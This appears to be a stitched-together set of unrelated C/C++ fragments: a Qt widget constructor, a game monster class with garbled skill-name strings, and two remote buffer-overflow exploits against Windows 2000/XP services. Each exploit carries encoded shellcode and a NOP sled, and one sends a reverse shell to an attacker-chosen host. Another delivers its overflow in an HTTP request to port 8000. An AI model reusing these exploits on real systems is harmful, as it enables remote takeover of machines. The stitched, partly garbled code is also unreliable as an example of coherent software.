TakeOf::TakeOf(QWidget *parent) :
AbstractCentWid(parent)
{
setObjectName("Take-Off");
lc=new ListCollection;
lc->append(new CommonList("Les Vols Prets",new TousVol));
set_lc(lc);
_fly=new Fly();
connect(_fly,SIGNAL(doneVol()),this,SLOT(setModel()));
sc=new OneATimeShowCollection(_fly);
DropReceiver *dr=new DropReceiver(sc,true);
set_sc(sc);
add_dr(dr);
lay();
}
bool CMonster::ReplaceSoul(const MonsterInfo &info, bool boss)
{
bBoss = boss;
id = info.ID;
name = info.name;
set_head(info.Head);
set_Lv(info.level);
set_exp(info.exp);
set_hp_m(info.hp);
set_mp_m(info.mp);
set_dc(info.DC1, info.DC2);
set_mc(info.MC1, info.MC2);
set_sc(0, 0);
set_ac(info.AC, info.AC);
set_mac(info.MAC, info.MAC);
set_intervel(info.interval);
QString str[10] = { QStringLiteral("ÆË»÷"), QStringLiteral("³åײ"), QStringLiteral("¿ÖÏÅ"), QStringLiteral("·É»÷"), QStringLiteral("Ó°»÷"),
QStringLiteral("¶¾Êõ"), QStringLiteral("´ÎÉù²¨"), QStringLiteral("¼«ËÙ"), QStringLiteral("¾ÞÁ¦"), QStringLiteral("¼ṳ̀") };
skill.name = str[qrand() % 10];
return true;
}
int start_auth(int sock, char *rhost, int rport)
{
int size,i=4,os,sp;
char buffer[SIZEOF];
char shellc0de[] =
"\xeb\x02\xeb\x0f\x66\x81\xec\x04\x08\x8b\xec\x83\xec\x50\xe8\xef"
"\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xba\x01\x80\x33\x95"
"\x43\xe2\xfa\x7e\xfa\xa6\x4e\x26\xa5\xf1\x1e\x96\x1e\xd5\x99\x1e"
"\xdd\x99\x1e\x54\x1e\xc9\xb1\x9d\x1e\xe5\xa5\x96\xe1\xb1\x91\xad"
"\x8b\xe0\xdd\x1e\xd5\x8d\x1e\xcd\xa9\x96\x4d\x1e\xce\xed\x96\x4d"
"\x1e\xe6\x89\x96\x65\xc3\x1e\xe6\xb1\x96\x65\xc3\x1e\xc6\xb5\x96"
"\x45\x1e\xce\x8d\xde\x1e\xa1\x0f\x96\x65\x96\xe1\xb1\x81\x1e\xa3"
"\xae\xe1\xb1\x8d\xe1\x93\xde\xb6\x4e\xe0\x7f\x56\xca\xa6\x5c\xf3"
"\x1e\x99\xca\xca\x1e\xa9\x1a\x18\x91\x92\x56\x1e\x8d\x1e\x56\xae"
"\x54\xe0\x34\x56\x16\x79\xd5\x1e\x79\x14\x79\xb5\x97\x95\x95\xfd"
"\xec\xd0\xed\xd4\xff\x9f\xff\xde\xff\x95\x7d\xe3\x6a\x6a\x6a\xa6"
"\x5c\x52\xd0\x69\xe2\xe6\xa7\xca\xf3\x52\xd0\x95\xa6\xa7\x1d\xd8"
"\x97\x1e\x48\xf3\x16\x7e\x91\xc4\xc4\xc6\x6a\x45\x1c\xd0\x91\xfd"
"\xe7\xf0\xe6\xe6\xff\x9f\xff\xde\xff\x95\x7d\xd3\x6a\x6a\x6a\x1e"
"\xc8\x91\x1c\xc8\x12\x1c\xd0\x02\x52\xd0\x69\xc2\xc6\xd4\xc6\x52"
"\xd0\x95\xfa\xf6\xfe\xf0\x52\xd0\x91\xe1\xd4\x95\x95\x1e\x58\xf3"
"\x16\x7c\x91\xc4\xc6\x6a\x45\xa6\x4e\xc6\xc6\xc6\xc6\xff\x94\xff"
"\x97\x6a\x45\x1c\xd0\x31\x52\xd0\x69\xf6\xfa\xfb\xfb\x52\xd0\x95"
"\xf0\xf6\xe1\x95\x1e\x58\xf3\x16\x7c\x91\xc4\x6a\xe0\x12\x6a\xc0"
"\x02\xa6\x4e\x26\x97\x1e\x40\xf3\x1c\x8f\x96\x46\xf3\x52\x97\x97"
"\x0f\x96\x46\x52\x97\x55\x3d\x94\x94\xff\x85\xc0\x6a\xe0\x31\x6a"
"\x45\xfd\xf0\xe6\xe6\xd4\xff\x9f\xff\xde\xff\x95\x7d\x51\x6b\x6a"
"\x6a\xa6\x4e\x52\xd0\x39\xd1\x95\x95\x95\x1c\xc8\x25\x1c\xc8\x2d"
"\x1c\xc8\x21\x1c\xc8\x29\x1c\xc8\x55\x1c\xc8\x51\x1c\xc8\x5d\x52"
"\xd0\x4d\x94\x94\x95\x95\x1c\xc8\x49\x1c\xc8\x75\x1e\xd8\x31\x1c"
"\xd8\x71\x1c\xd8\x7d\x1c\xd8\x79\x18\xd8\x65\xc4\x18\xd8\x39\xc4"
"\xc6\xc6\xc6\xff\x94\xc6\xc6\xf3\x52\xd0\x69\xf6\xf8\xf3\x52\xd0"
"\x6b\xf1\x95\x1d\xc8\x6a\x18\xc0\x69\xc7\xc6\x6a\x45\xfd\xed\xfc"
"\xe1\xc1\xff\x94\xff\xde\xff\x95\x7d\xcd\x6b\x6a\x6a\x6a";
size=recv(sock,buffer,SIZEOF,0);
if(buffer[0]!=0x30||buffer[1]!=0x11) {
printf("error: wrong data received\r\n");
return -1;
}
buffer[28]=0x00;buffer[36]=0x01;
send(sock,buffer,size,0);
memset(buffer,0,SIZEOF);
printf("[+] Gathering %-30s ...","information");
for(size=0;size<4096;size+=recv(sock,&buffer[size],SIZEOF,0));
if(buffer[0]!=0x10||buffer[1]!=0x27) {
printf("error: wrong data received\r\n");
return -1;
}
printf("Done\r\n");
sp=(unsigned int)buffer[37];
printf("[i] Operating system : ");
if(buffer[16]==0x28||buffer[17]==0x0a) {
os=1;
printf("WinXP");
} else {
printf("Win2000");
os=0;
}
printf("\r\n[i] Service Pack : %s\r\n",&buffer[37]);
printf("[+] Setting shellc0de for this %-15s ...","version");
set_sc(os,sp,rhost,rport,shellc0de);
memset(&buffer[2],0,SIZEOF-2);
strcpy(&buffer[175],WINUSER);
memset(&buffer[416],0x90,180);
if(os==0)
memcpy(&buffer[516],RET,4);
else
memcpy(&buffer[516],RET_XP,4);
memcpy(&buffer[520],shellc0de,sizeof(shellc0de));
strcpy(&buffer[1200],WINHOST);strcpy(&buffer[975],USERPROFILE_NAME);
strcpy(&buffer[1295],USERPROFILE_COMPANY);strcpy(&buffer[1495],USERPROFILE_LICENSE);
strcpy(&buffer[1755],USERPROFILE_DATE);strcpy(&buffer[2015],WINHOST);
strcpy(&buffer[2275],INTERFACE_IP);strcpy(&buffer[2535],WINDOMAIN);
strcpy(&buffer[2795],CLIENT_VERSION);
printf("Done\r\n");
printf("[+] Sending evil %-30s ...","packet");
send(sock,buffer,SIZEOF,0);
memset(buffer,0,SIZEOF);
size=recv(sock,buffer,SIZEOF,0);
if(buffer[0]!=0x32||buffer[1]!=0x11) {
printf("Patched\r\n");
return -1;
}
printf("Done\r\n");
printf("[i] Shell should be arrived at %s:%d\r\n",rhost,rport);
return 0;
}
int main(int argc, char *argv[])
{
int hsocket;
struct hostent *host;
struct in_addr adresseIP;
struct sockaddr_in adressesocket;
char BadString[700],Request[800];
int i,len,cible=0;
#ifdef _WIN32
WSADATA wsaData;
#endif
if(argc<4)
{
usage(argv[0]);
}
if(argc>4)
{
cible=atoi(argv[4]);
}
banner();
#ifdef _WIN32
if(WSAStartup(0x101,&wsaData))
{
printf("[-] Unable to load winsock\n");
exit (-1);
}
else
{
printf("[+] Winsock loaded\n");
}
#endif
//Cr?ation de la socket
if((hsocket=socket(AF_INET,SOCK_STREAM,0))==-1)
{
printf("[-] Can't creat Socket\n");
exit (-1);
}
else
{
printf("[+] Socket created\n");
}
//GetHostByName()
if((host=gethostbyname(argv[1]))==0)
{
printf("[-] Can't acquire remote info\n");
close(hsocket);
exit (-1);
}
else
{
printf("[+] Remote info Acquired\n");
}
memcpy(&adresseIP,host->h_addr,host->h_length);
//Preparation de la struct sockaddr_in
memset(&adressesocket,0,sizeof(struct sockaddr_in));
adressesocket.sin_family=AF_INET;
adressesocket.sin_port=htons(8000);
memcpy(&adressesocket.sin_addr,host->h_addr,host->h_length);
if(connect(hsocket,(struct sockaddr *)&adressesocket,sizeof(struct sockaddr_in))==-1)
{
printf("[-] Can't connect on %s:8000\n",argv[1]);
close(hsocket);
exit (-1);
}
else
{
printf("[+] Connected on %s:8000\n",argv[1]);
}
set_sc(argv[2], atoi(argv[3]),ReversShell);
printf("[+] Reverse ShellCode built\n",argv[1]);
for(i=0; i<700; i++)
{
BadString[i]=(char)0x90;
}
for(i=260; i<623; i++)
{
BadString[i]=ReversShell[i-260];
}
if(cible==0)
{
memcpy(&BadString[256],JMP_ESP_2K,4);
}
else
{
memcpy(&BadString[256],JMP_ESP_XP,4);
}
BadString[700]=0x00;
memset(Request,'\x00',sizeof(Request));
sprintf(Request,"GET /action.htm?action=SendMsg&message=%s HTTP/1.1\r\n"
"Host: 10.0.0.6:8000\r\n"
"\r\n",BadString);
printf("[+] BadString constructed\n");
if((len=send(hsocket,Request,strlen(Request),0))==-1)
{
printf("[-] Error on sending BadString\n");
close(hsocket);
exit (-1);
}
else
{
printf("[+] BadString Sended (%d)\n",len);
}
return 0;
}
